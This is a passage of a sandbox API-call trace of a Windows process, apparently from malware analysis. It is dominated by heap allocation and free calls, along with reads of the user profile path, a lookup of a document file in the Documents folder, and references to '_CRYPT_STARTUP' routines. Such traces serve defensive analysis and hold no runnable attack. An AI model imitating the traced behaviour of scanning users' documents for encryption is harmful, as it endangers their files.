hHeap=0x970000) returned 1 [0267.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0267.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0267.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0267.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0267.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0267.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0267.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0267.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0267.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0267.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0267.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f08 [0267.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0267.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0267.887] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0267.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0267.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0267.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0267.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0267.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0267.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0267.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0267.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0267.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0267.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0267.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0267.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0267.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0267.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0267.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0267.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0267.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e58 [0267.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0267.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0267.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0267.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0267.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0267.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0267.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0267.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0267.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517f0 [0267.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0267.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0267.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0267.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0267.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0267.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0267.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0267.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0267.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0267.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0267.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0267.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0267.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0267.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0267.889] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0267.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0267.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0267.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0267.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0267.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0267.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0267.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0267.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0267.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0267.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0267.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0267.890] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0267.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0267.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0267.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0267.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0267.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0267.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0267.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0267.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0267.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0267.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0267.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0267.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0267.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0267.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0267.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0267.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0267.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0267.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0267.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0267.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0267.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0267.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0267.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0267.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0267.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0267.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0267.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0267.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0267.891] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0267.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0267.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0267.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0267.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0267.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0267.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0267.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0267.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0267.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0267.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0267.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0267.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0267.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0267.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0267.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0267.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.892] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0267.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0267.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0267.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0267.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0267.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0267.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0267.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0267.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0267.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0267.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0267.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0267.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0267.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0267.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0267.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0267.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0267.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.892] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/VQCf4sXQz0.docx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bfe5970, ftCreationTime.dwHighDateTime=0x1d5db78, ftLastAccessTime.dwLowDateTime=0x72fe6bb0, ftLastAccessTime.dwHighDateTime=0x1d5a50a, ftLastWriteTime.dwLowDateTime=0x72fe6bb0, ftLastWriteTime.dwHighDateTime=0x1d5a50a, nFileSizeHigh=0x0, nFileSizeLow=0x731b, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="VQCf4sXQz0.docx", cAlternateFileName="VQCF4S~1.DOC")) returned 0xa87510 [0267.893] FindClose (in: hFindFile=0xa87510 | out: hFindFile=0xa87510) returned 1 [0267.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0267.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0267.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0267.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0267.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0267.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0267.893] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0267.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0267.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0267.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0267.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0267.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0267.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0267.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0267.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0267.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0267.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0267.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0267.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0267.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0267.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0267.894] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0267.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0267.894] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0267.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0267.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0267.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51658 [0267.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0267.894] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0267.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0267.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0267.895] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0267.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0267.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0267.895] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0267.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0267.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0267.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0267.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0267.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0267.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0267.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0267.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0267.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0267.895] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0267.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0267.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0267.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0267.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0267.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0267.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0267.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0267.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0267.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0267.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0267.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0267.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0267.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0267.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0267.896] RtlAllocateHeap 